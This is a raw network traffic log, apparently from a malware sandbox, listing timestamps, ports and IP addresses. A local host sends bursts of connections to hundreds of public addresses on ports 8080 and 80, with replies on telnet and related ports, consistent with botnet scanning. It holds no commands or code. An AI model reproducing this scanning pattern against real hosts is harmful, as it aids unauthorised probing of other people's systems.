Feb 25, 2024 19:02:16.874453068 CET	6758	8080	192.168.2.15	85.129.110.126
Feb 25, 2024 19:02:16.874453068 CET	6758	8080	192.168.2.15	62.92.3.176
Feb 25, 2024 19:02:16.874460936 CET	6758	8080	192.168.2.15	31.101.33.36
Feb 25, 2024 19:02:16.874468088 CET	6758	8080	192.168.2.15	94.137.52.197
Feb 25, 2024 19:02:16.874469995 CET	6758	8080	192.168.2.15	85.128.69.63
Feb 25, 2024 19:02:16.874469995 CET	6758	8080	192.168.2.15	31.251.0.22
Feb 25, 2024 19:02:16.874475002 CET	6758	8080	192.168.2.15	85.227.178.83
Feb 25, 2024 19:02:16.874480963 CET	6758	8080	192.168.2.15	94.211.210.97
Feb 25, 2024 19:02:16.874480963 CET	6758	8080	192.168.2.15	31.190.158.65
Feb 25, 2024 19:02:16.874500990 CET	6758	8080	192.168.2.15	85.46.238.58
Feb 25, 2024 19:02:16.874501944 CET	6758	8080	192.168.2.15	62.7.55.175
Feb 25, 2024 19:02:16.874501944 CET	6758	8080	192.168.2.15	85.88.209.90
Feb 25, 2024 19:02:16.874501944 CET	6758	8080	192.168.2.15	85.241.119.16
Feb 25, 2024 19:02:16.874501944 CET	6758	8080	192.168.2.15	62.124.252.203
Feb 25, 2024 19:02:16.874510050 CET	6758	8080	192.168.2.15	95.29.7.211
Feb 25, 2024 19:02:16.874512911 CET	6758	8080	192.168.2.15	62.133.106.70
Feb 25, 2024 19:02:16.874512911 CET	6758	8080	192.168.2.15	31.69.28.28
Feb 25, 2024 19:02:16.874512911 CET	6758	8080	192.168.2.15	62.92.148.218
Feb 25, 2024 19:02:16.874521971 CET	6758	8080	192.168.2.15	95.158.181.44
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	95.124.100.185
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	62.149.46.184
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	94.117.39.106
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	62.170.135.20
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	95.229.167.4
Feb 25, 2024 19:02:16.874522924 CET	6758	8080	192.168.2.15	94.65.227.234
Feb 25, 2024 19:02:16.874526024 CET	6758	8080	192.168.2.15	95.88.64.216
Feb 25, 2024 19:02:16.874526978 CET	6758	8080	192.168.2.15	31.137.134.209
Feb 25, 2024 19:02:16.874531984 CET	6758	8080	192.168.2.15	94.93.143.206
Feb 25, 2024 19:02:16.874531984 CET	6758	8080	192.168.2.15	94.67.202.79
Feb 25, 2024 19:02:16.874531984 CET	6758	8080	192.168.2.15	31.208.45.18
Feb 25, 2024 19:02:16.874531984 CET	6758	8080	192.168.2.15	95.121.30.193
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	94.191.148.242
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	95.241.61.141
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	94.55.201.68
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	62.126.35.245
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	31.184.212.204
Feb 25, 2024 19:02:16.874538898 CET	6758	8080	192.168.2.15	94.204.148.212
Feb 25, 2024 19:02:16.874541998 CET	6758	8080	192.168.2.15	85.184.235.182
Feb 25, 2024 19:02:16.874541998 CET	6758	8080	192.168.2.15	31.25.198.253
Feb 25, 2024 19:02:16.874541998 CET	6758	8080	192.168.2.15	85.249.177.90
Feb 25, 2024 19:02:16.874541998 CET	6758	8080	192.168.2.15	95.222.57.118
Feb 25, 2024 19:02:16.874541998 CET	6758	8080	192.168.2.15	94.221.63.105
Feb 25, 2024 19:02:16.874558926 CET	6758	8080	192.168.2.15	94.184.229.97
Feb 25, 2024 19:02:16.874558926 CET	6758	8080	192.168.2.15	31.110.111.83
Feb 25, 2024 19:02:16.874558926 CET	6758	8080	192.168.2.15	85.226.83.226
Feb 25, 2024 19:02:16.874558926 CET	6758	8080	192.168.2.15	94.126.251.237
Feb 25, 2024 19:02:16.874564886 CET	6758	8080	192.168.2.15	94.8.48.229
Feb 25, 2024 19:02:16.874568939 CET	6758	8080	192.168.2.15	62.145.136.150
Feb 25, 2024 19:02:16.874568939 CET	6758	8080	192.168.2.15	94.173.39.254
Feb 25, 2024 19:02:16.874572992 CET	6758	8080	192.168.2.15	62.204.227.44
Feb 25, 2024 19:02:16.874572992 CET	6758	8080	192.168.2.15	31.182.164.111
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	31.24.86.240
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	85.81.243.238
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	95.158.73.90
Feb 25, 2024 19:02:16.874583960 CET	6758	8080	192.168.2.15	94.59.64.217
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	95.172.135.244
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	95.130.252.67
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	95.19.134.169
Feb 25, 2024 19:02:16.874582052 CET	6758	8080	192.168.2.15	62.17.101.185
Feb 25, 2024 19:02:16.874589920 CET	6758	8080	192.168.2.15	94.123.251.46
Feb 25, 2024 19:02:16.874589920 CET	6758	8080	192.168.2.15	95.180.44.49
Feb 25, 2024 19:02:16.874593973 CET	6758	8080	192.168.2.15	62.124.227.122
Feb 25, 2024 19:02:16.874593973 CET	6758	8080	192.168.2.15	62.233.243.175
Feb 25, 2024 19:02:16.874593973 CET	6758	8080	192.168.2.15	94.147.217.219
Feb 25, 2024 19:02:16.874603033 CET	6758	8080	192.168.2.15	85.151.152.234
Feb 25, 2024 19:02:16.874603033 CET	6758	8080	192.168.2.15	95.88.92.91
Feb 25, 2024 19:02:16.874603033 CET	6758	8080	192.168.2.15	94.220.250.238
Feb 25, 2024 19:02:16.874603033 CET	6758	8080	192.168.2.15	94.179.72.1
Feb 25, 2024 19:02:16.874605894 CET	6758	8080	192.168.2.15	62.148.245.187
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	85.226.60.23
Feb 25, 2024 19:02:16.874612093 CET	6758	8080	192.168.2.15	31.188.187.119
Feb 25, 2024 19:02:16.874612093 CET	6758	8080	192.168.2.15	31.112.254.184
Feb 25, 2024 19:02:16.874612093 CET	6758	8080	192.168.2.15	31.165.131.44
Feb 25, 2024 19:02:16.874612093 CET	6758	8080	192.168.2.15	95.72.12.201
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	85.178.26.233
Feb 25, 2024 19:02:16.874612093 CET	6758	8080	192.168.2.15	85.249.206.232
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	85.49.97.122
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	62.56.32.214
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	85.196.237.85
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	95.212.109.52
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	62.112.133.23
Feb 25, 2024 19:02:16.874609947 CET	6758	8080	192.168.2.15	62.126.201.240
Feb 25, 2024 19:02:16.874622107 CET	6758	8080	192.168.2.15	31.159.222.133
Feb 25, 2024 19:02:16.874622107 CET	6758	8080	192.168.2.15	94.13.200.103
Feb 25, 2024 19:02:16.874635935 CET	6758	8080	192.168.2.15	31.185.221.7
Feb 25, 2024 19:02:16.874640942 CET	6758	8080	192.168.2.15	31.71.166.242
Feb 25, 2024 19:02:16.874640942 CET	6758	8080	192.168.2.15	31.220.138.78
Feb 25, 2024 19:02:16.874644041 CET	6758	8080	192.168.2.15	94.49.220.65
Feb 25, 2024 19:02:16.874644041 CET	6758	8080	192.168.2.15	31.1.161.217
Feb 25, 2024 19:02:16.874644041 CET	6758	8080	192.168.2.15	85.229.36.71
Feb 25, 2024 19:02:16.874646902 CET	6758	8080	192.168.2.15	95.168.91.249
Feb 25, 2024 19:02:16.874650002 CET	6758	8080	192.168.2.15	62.1.244.131
Feb 25, 2024 19:02:16.874650002 CET	6758	8080	192.168.2.15	31.81.6.15
Feb 25, 2024 19:02:16.874663115 CET	6758	8080	192.168.2.15	85.18.27.218
Feb 25, 2024 19:02:16.874666929 CET	6758	8080	192.168.2.15	94.170.98.73
Feb 25, 2024 19:02:16.874666929 CET	6758	8080	192.168.2.15	94.105.36.148
Feb 25, 2024 19:02:16.874671936 CET	6758	8080	192.168.2.15	95.167.24.169
Feb 25, 2024 19:02:16.874671936 CET	6758	8080	192.168.2.15	31.26.18.8
Feb 25, 2024 19:02:16.874671936 CET	6758	8080	192.168.2.15	95.45.114.74
Feb 25, 2024 19:02:16.874674082 CET	6758	8080	192.168.2.15	31.171.160.248
Feb 25, 2024 19:02:16.874674082 CET	6758	8080	192.168.2.15	31.114.177.235
Feb 25, 2024 19:02:16.874681950 CET	6758	8080	192.168.2.15	85.39.71.55
Feb 25, 2024 19:02:16.874682903 CET	6758	8080	192.168.2.15	94.82.86.226
Feb 25, 2024 19:02:16.874681950 CET	6758	8080	192.168.2.15	95.48.60.6
Feb 25, 2024 19:02:16.874681950 CET	6758	8080	192.168.2.15	85.112.253.72
Feb 25, 2024 19:02:16.874681950 CET	6758	8080	192.168.2.15	85.116.80.205
Feb 25, 2024 19:02:16.874685049 CET	6758	8080	192.168.2.15	95.29.98.112
Feb 25, 2024 19:02:16.874681950 CET	6758	8080	192.168.2.15	95.92.206.55
Feb 25, 2024 19:02:16.874699116 CET	6758	8080	192.168.2.15	31.105.136.143
Feb 25, 2024 19:02:16.874699116 CET	6758	8080	192.168.2.15	94.2.74.54
Feb 25, 2024 19:02:16.874700069 CET	6758	8080	192.168.2.15	85.49.59.170
Feb 25, 2024 19:02:16.874701023 CET	6758	8080	192.168.2.15	94.222.214.36
Feb 25, 2024 19:02:16.874701023 CET	6758	8080	192.168.2.15	94.138.250.137
Feb 25, 2024 19:02:16.874700069 CET	6758	8080	192.168.2.15	62.92.203.174
Feb 25, 2024 19:02:16.874700069 CET	6758	8080	192.168.2.15	94.14.17.208
Feb 25, 2024 19:02:16.874705076 CET	6758	8080	192.168.2.15	95.36.114.146
Feb 25, 2024 19:02:16.874705076 CET	6758	8080	192.168.2.15	62.170.244.161
Feb 25, 2024 19:02:16.874705076 CET	6758	8080	192.168.2.15	85.63.231.57
Feb 25, 2024 19:02:16.874715090 CET	6758	8080	192.168.2.15	94.146.136.72
Feb 25, 2024 19:02:16.874716043 CET	6758	8080	192.168.2.15	31.115.134.174
Feb 25, 2024 19:02:16.874716043 CET	6758	8080	192.168.2.15	85.115.141.79
Feb 25, 2024 19:02:16.874716043 CET	6758	8080	192.168.2.15	94.97.220.142
Feb 25, 2024 19:02:16.874718904 CET	6758	8080	192.168.2.15	95.148.242.222
Feb 25, 2024 19:02:16.874718904 CET	6758	8080	192.168.2.15	94.94.8.118
Feb 25, 2024 19:02:16.874718904 CET	6758	8080	192.168.2.15	31.232.117.84
Feb 25, 2024 19:02:16.874720097 CET	6758	8080	192.168.2.15	94.143.145.81
Feb 25, 2024 19:02:16.874722004 CET	6758	8080	192.168.2.15	95.199.144.65
Feb 25, 2024 19:02:16.874732971 CET	6758	8080	192.168.2.15	95.1.37.30
Feb 25, 2024 19:02:16.874732971 CET	6758	8080	192.168.2.15	31.3.245.27
Feb 25, 2024 19:02:16.874732971 CET	6758	8080	192.168.2.15	85.253.222.215
Feb 25, 2024 19:02:16.874735117 CET	6758	8080	192.168.2.15	95.58.149.203
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	94.121.192.250
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	94.55.177.36
Feb 25, 2024 19:02:16.874737024 CET	6758	8080	192.168.2.15	95.86.73.251
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	85.33.84.132
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	94.250.28.19
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	31.80.243.108
Feb 25, 2024 19:02:16.874736071 CET	6758	8080	192.168.2.15	85.92.203.165
Feb 25, 2024 19:02:16.874742031 CET	6758	8080	192.168.2.15	62.61.138.45
Feb 25, 2024 19:02:16.874742985 CET	6758	8080	192.168.2.15	95.114.72.205
Feb 25, 2024 19:02:16.874742985 CET	6758	8080	192.168.2.15	85.42.109.117
Feb 25, 2024 19:02:16.874742985 CET	6758	8080	192.168.2.15	31.67.63.46
Feb 25, 2024 19:02:16.874742985 CET	6758	8080	192.168.2.15	94.11.49.105
Feb 25, 2024 19:02:16.874742985 CET	6758	8080	192.168.2.15	31.52.174.173
Feb 25, 2024 19:02:16.874747038 CET	6758	8080	192.168.2.15	94.228.19.175
Feb 25, 2024 19:02:16.874747992 CET	6758	8080	192.168.2.15	31.116.104.174
Feb 25, 2024 19:02:16.874757051 CET	6758	8080	192.168.2.15	94.215.62.200
Feb 25, 2024 19:02:16.874758005 CET	6758	8080	192.168.2.15	95.17.20.29
Feb 25, 2024 19:02:16.874758005 CET	6758	8080	192.168.2.15	31.86.218.210
Feb 25, 2024 19:02:16.874761105 CET	6758	8080	192.168.2.15	94.241.132.56
Feb 25, 2024 19:02:16.874758005 CET	6758	8080	192.168.2.15	62.118.108.221
Feb 25, 2024 19:02:16.874761105 CET	6758	8080	192.168.2.15	85.104.251.143
Feb 25, 2024 19:02:16.874758005 CET	6758	8080	192.168.2.15	85.70.154.31
Feb 25, 2024 19:02:16.874761105 CET	6758	8080	192.168.2.15	31.171.150.96
Feb 25, 2024 19:02:16.874758005 CET	6758	8080	192.168.2.15	95.98.232.152
Feb 25, 2024 19:02:16.874764919 CET	6758	8080	192.168.2.15	31.122.32.74
Feb 25, 2024 19:02:16.874764919 CET	6758	8080	192.168.2.15	94.136.202.213
Feb 25, 2024 19:02:16.874764919 CET	6758	8080	192.168.2.15	31.94.40.16
Feb 25, 2024 19:02:16.874766111 CET	6758	8080	192.168.2.15	31.187.206.117
Feb 25, 2024 19:02:16.874767065 CET	6758	8080	192.168.2.15	85.61.123.48
Feb 25, 2024 19:02:16.874767065 CET	6758	8080	192.168.2.15	62.119.186.109
Feb 25, 2024 19:02:16.874768972 CET	6758	8080	192.168.2.15	94.188.189.207
Feb 25, 2024 19:02:16.874768972 CET	6758	8080	192.168.2.15	62.35.74.247
Feb 25, 2024 19:02:16.874768972 CET	6758	8080	192.168.2.15	94.27.200.213
Feb 25, 2024 19:02:16.874768972 CET	6758	8080	192.168.2.15	85.230.129.253
Feb 25, 2024 19:02:16.874792099 CET	6758	8080	192.168.2.15	31.159.198.193
Feb 25, 2024 19:02:16.874797106 CET	6758	8080	192.168.2.15	31.108.37.29
Feb 25, 2024 19:02:16.874797106 CET	6758	8080	192.168.2.15	95.164.128.192
Feb 25, 2024 19:02:16.874797106 CET	6758	8080	192.168.2.15	85.142.74.138
Feb 25, 2024 19:02:16.874799013 CET	6758	8080	192.168.2.15	31.161.36.240
Feb 25, 2024 19:02:16.874814034 CET	6758	8080	192.168.2.15	31.171.131.11
Feb 25, 2024 19:02:16.874814987 CET	6758	8080	192.168.2.15	95.218.60.183
Feb 25, 2024 19:02:16.874818087 CET	6758	8080	192.168.2.15	85.128.240.220
Feb 25, 2024 19:02:16.874818087 CET	6758	8080	192.168.2.15	31.18.207.170
Feb 25, 2024 19:02:16.874818087 CET	6758	8080	192.168.2.15	85.168.12.138
Feb 25, 2024 19:02:16.874819040 CET	6758	8080	192.168.2.15	31.91.150.24
Feb 25, 2024 19:02:16.874819040 CET	6758	8080	192.168.2.15	31.173.88.30
Feb 25, 2024 19:02:16.874819040 CET	6758	8080	192.168.2.15	95.10.117.152
Feb 25, 2024 19:02:16.874819040 CET	6758	8080	192.168.2.15	85.170.252.120
Feb 25, 2024 19:02:16.874819040 CET	6758	8080	192.168.2.15	62.153.181.234
Feb 25, 2024 19:02:16.874819994 CET	6758	8080	192.168.2.15	95.36.128.99
Feb 25, 2024 19:02:16.874819994 CET	6758	8080	192.168.2.15	94.21.111.201
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	62.18.96.131
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	62.159.132.112
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	31.98.87.67
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	85.133.246.109
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	94.92.210.196
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	85.135.247.147
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	62.195.66.182
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	94.209.202.26
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	31.43.47.28
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	62.77.180.94
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	95.250.8.71
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	94.159.123.52
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	94.220.6.46
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	85.36.114.202
Feb 25, 2024 19:02:16.874831915 CET	6758	8080	192.168.2.15	62.37.16.43
Feb 25, 2024 19:02:16.874825001 CET	6758	8080	192.168.2.15	31.235.14.146
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	94.207.78.231
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	31.57.253.96
Feb 25, 2024 19:02:16.874831915 CET	6758	8080	192.168.2.15	85.203.156.43
Feb 25, 2024 19:02:16.874835014 CET	6758	8080	192.168.2.15	62.39.210.3
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	94.174.51.115
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	94.218.105.43
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	85.20.73.84
Feb 25, 2024 19:02:16.874829054 CET	6758	8080	192.168.2.15	31.234.253.30
Feb 25, 2024 19:02:16.874824047 CET	6758	8080	192.168.2.15	94.142.166.200
Feb 25, 2024 19:02:16.874840975 CET	6758	8080	192.168.2.15	95.9.215.126
Feb 25, 2024 19:02:16.874840975 CET	6758	8080	192.168.2.15	62.216.20.124
Feb 25, 2024 19:02:16.874840975 CET	6758	8080	192.168.2.15	85.168.12.150
Feb 25, 2024 19:02:16.874860048 CET	6758	8080	192.168.2.15	95.183.35.183
Feb 25, 2024 19:02:16.874860048 CET	6758	8080	192.168.2.15	62.32.234.214
Feb 25, 2024 19:02:16.874878883 CET	6758	8080	192.168.2.15	94.71.134.134
Feb 25, 2024 19:02:16.874878883 CET	6758	8080	192.168.2.15	62.97.184.230
Feb 25, 2024 19:02:16.874881983 CET	6758	8080	192.168.2.15	62.129.225.192
Feb 25, 2024 19:02:16.874881983 CET	6758	8080	192.168.2.15	94.8.17.77
Feb 25, 2024 19:02:16.874881983 CET	6758	8080	192.168.2.15	62.123.26.98
Feb 25, 2024 19:02:16.874881983 CET	6758	8080	192.168.2.15	62.220.254.149
Feb 25, 2024 19:02:16.874905109 CET	6758	8080	192.168.2.15	85.128.106.78
Feb 25, 2024 19:02:16.874905109 CET	6758	8080	192.168.2.15	85.168.78.124
Feb 25, 2024 19:02:16.874905109 CET	6758	8080	192.168.2.15	62.75.154.75
Feb 25, 2024 19:02:16.874918938 CET	6758	8080	192.168.2.15	85.51.139.175
Feb 25, 2024 19:02:16.874921083 CET	6758	8080	192.168.2.15	31.70.154.69
Feb 25, 2024 19:02:16.874921083 CET	6758	8080	192.168.2.15	62.231.158.135
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	85.72.192.249
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	95.251.229.63
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	85.150.235.132
Feb 25, 2024 19:02:16.874934912 CET	6758	8080	192.168.2.15	85.28.37.84
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	62.60.234.191
Feb 25, 2024 19:02:16.874934912 CET	6758	8080	192.168.2.15	95.77.0.241
Feb 25, 2024 19:02:16.874938011 CET	6758	8080	192.168.2.15	31.184.10.152
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	62.54.170.84
Feb 25, 2024 19:02:16.874938011 CET	6758	8080	192.168.2.15	94.194.233.57
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	62.18.215.248
Feb 25, 2024 19:02:16.874941111 CET	6758	8080	192.168.2.15	62.164.196.247
Feb 25, 2024 19:02:16.874933958 CET	6758	8080	192.168.2.15	31.171.22.245
Feb 25, 2024 19:02:16.874941111 CET	6758	8080	192.168.2.15	31.145.163.241
Feb 25, 2024 19:02:16.874942064 CET	6758	8080	192.168.2.15	31.16.149.122
Feb 25, 2024 19:02:16.874942064 CET	6758	8080	192.168.2.15	94.12.14.252
Feb 25, 2024 19:02:16.874942064 CET	6758	8080	192.168.2.15	62.155.218.157
Feb 25, 2024 19:02:16.874946117 CET	6758	8080	192.168.2.15	31.87.158.162
Feb 25, 2024 19:02:16.874952078 CET	6758	8080	192.168.2.15	31.90.202.146
Feb 25, 2024 19:02:16.874952078 CET	6758	8080	192.168.2.15	95.21.228.115
Feb 25, 2024 19:02:16.874952078 CET	6758	8080	192.168.2.15	85.179.101.147
Feb 25, 2024 19:02:16.874952078 CET	6758	8080	192.168.2.15	62.226.14.101
Feb 25, 2024 19:02:16.874963045 CET	6758	8080	192.168.2.15	85.249.133.8
Feb 25, 2024 19:02:16.874963999 CET	6758	8080	192.168.2.15	85.106.187.56
Feb 25, 2024 19:02:16.874965906 CET	6758	8080	192.168.2.15	62.6.36.228
Feb 25, 2024 19:02:16.874965906 CET	6758	8080	192.168.2.15	31.84.128.7
Feb 25, 2024 19:02:16.874969959 CET	6758	8080	192.168.2.15	31.148.15.112
Feb 25, 2024 19:02:16.874969959 CET	6758	8080	192.168.2.15	31.252.197.155
Feb 25, 2024 19:02:16.874969959 CET	6758	8080	192.168.2.15	31.72.106.27
Feb 25, 2024 19:02:16.874969959 CET	6758	8080	192.168.2.15	62.143.186.193
Feb 25, 2024 19:02:16.874979019 CET	6758	8080	192.168.2.15	62.154.125.196
Feb 25, 2024 19:02:16.874982119 CET	6758	8080	192.168.2.15	94.136.242.62
Feb 25, 2024 19:02:16.874982119 CET	6758	8080	192.168.2.15	95.251.158.181
Feb 25, 2024 19:02:16.874982119 CET	6758	8080	192.168.2.15	85.206.33.89
Feb 25, 2024 19:02:16.874984026 CET	6758	8080	192.168.2.15	85.142.200.128
Feb 25, 2024 19:02:16.874984026 CET	6758	8080	192.168.2.15	62.245.248.131
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	95.215.7.213
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	62.162.153.155
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	94.119.140.137
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	94.202.226.203
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	94.231.81.13
Feb 25, 2024 19:02:16.874994040 CET	6758	8080	192.168.2.15	94.179.30.57
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	85.189.197.4
Feb 25, 2024 19:02:16.874995947 CET	6758	8080	192.168.2.15	62.138.93.156
Feb 25, 2024 19:02:16.874998093 CET	6758	8080	192.168.2.15	62.228.142.3
Feb 25, 2024 19:02:16.874991894 CET	6758	8080	192.168.2.15	94.66.242.248
Feb 25, 2024 19:02:16.874994993 CET	6758	8080	192.168.2.15	31.205.71.87
Feb 25, 2024 19:02:16.874994040 CET	6758	8080	192.168.2.15	62.189.110.221
Feb 25, 2024 19:02:16.874998093 CET	6758	8080	192.168.2.15	94.81.245.117
Feb 25, 2024 19:02:16.874994040 CET	6758	8080	192.168.2.15	31.187.180.157
Feb 25, 2024 19:02:16.874994040 CET	6758	8080	192.168.2.15	31.254.247.52
Feb 25, 2024 19:02:16.874994993 CET	6758	8080	192.168.2.15	94.11.35.233
Feb 25, 2024 19:02:16.875010967 CET	6758	8080	192.168.2.15	94.67.184.69
Feb 25, 2024 19:02:16.875010967 CET	6758	8080	192.168.2.15	95.89.51.242
Feb 25, 2024 19:02:16.875025988 CET	44732	8080	192.168.2.15	94.123.6.73
Feb 25, 2024 19:02:16.952068090 CET	80	6502	95.178.9.8	192.168.2.15
Feb 25, 2024 19:02:16.957510948 CET	80	6502	95.164.203.199	192.168.2.15
Feb 25, 2024 19:02:17.047159910 CET	80	6502	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:17.047260046 CET	6502	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:17.052928925 CET	23	58983	37.184.75.137	192.168.2.15
Feb 25, 2024 19:02:17.053745031 CET	80	6502	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:17.053809881 CET	6502	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:17.054564953 CET	80	6502	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:17.054613113 CET	6502	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:17.077394962 CET	8080	6758	62.175.235.244	192.168.2.15
Feb 25, 2024 19:02:17.085827112 CET	8080	6758	62.128.110.127	192.168.2.15
Feb 25, 2024 19:02:17.088650942 CET	8080	6758	62.101.210.139	192.168.2.15
Feb 25, 2024 19:02:17.092601061 CET	80	6502	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:17.092696905 CET	6502	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:17.105417013 CET	80	6502	95.100.51.55	192.168.2.15
Feb 25, 2024 19:02:17.105483055 CET	6502	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:17.119426012 CET	23	58983	201.215.46.175	192.168.2.15
Feb 25, 2024 19:02:17.126333952 CET	80	6502	95.56.81.125	192.168.2.15
Feb 25, 2024 19:02:17.126426935 CET	6502	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:17.132335901 CET	80	6502	95.56.25.22	192.168.2.15
Feb 25, 2024 19:02:17.132447958 CET	6502	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:17.134315968 CET	37215	6246	197.128.17.76	192.168.2.15
Feb 25, 2024 19:02:17.167819023 CET	2323	58983	202.47.148.10	192.168.2.15
Feb 25, 2024 19:02:17.197232962 CET	37215	6246	197.254.43.187	192.168.2.15
Feb 25, 2024 19:02:17.222407103 CET	37215	6246	197.249.224.217	192.168.2.15
Feb 25, 2024 19:02:17.335300922 CET	37215	6246	197.131.63.116	192.168.2.15
Feb 25, 2024 19:02:17.410943031 CET	37215	6246	197.158.124.114	192.168.2.15
Feb 25, 2024 19:02:17.858855963 CET	6502	80	192.168.2.15	88.108.69.77
Feb 25, 2024 19:02:17.858855963 CET	6502	80	192.168.2.15	88.113.27.251
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.23.191.173
Feb 25, 2024 19:02:17.858858109 CET	6502	80	192.168.2.15	88.227.239.216
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.65.16.139
Feb 25, 2024 19:02:17.858858109 CET	6502	80	192.168.2.15	88.92.250.152
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.64.189.61
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.133.136.94
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.223.118.191
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.167.251.236
Feb 25, 2024 19:02:17.858855963 CET	6502	80	192.168.2.15	88.41.233.186
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.68.142.220
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.114.117.103
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.33.54.91
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.216.229.228
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.6.56.207
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.244.251.180
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.87.186.204
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.160.173.140
Feb 25, 2024 19:02:17.858860016 CET	6502	80	192.168.2.15	88.233.15.109
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.69.105.217
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.148.18.24
Feb 25, 2024 19:02:17.858864069 CET	6502	80	192.168.2.15	88.170.81.106
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.100.130.91
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.3.1.25
Feb 25, 2024 19:02:17.858864069 CET	6502	80	192.168.2.15	88.243.44.63
Feb 25, 2024 19:02:17.858859062 CET	6502	80	192.168.2.15	88.175.99.190
Feb 25, 2024 19:02:17.858864069 CET	6502	80	192.168.2.15	88.22.160.45
Feb 25, 2024 19:02:17.858863115 CET	6502	80	192.168.2.15	88.88.3.198
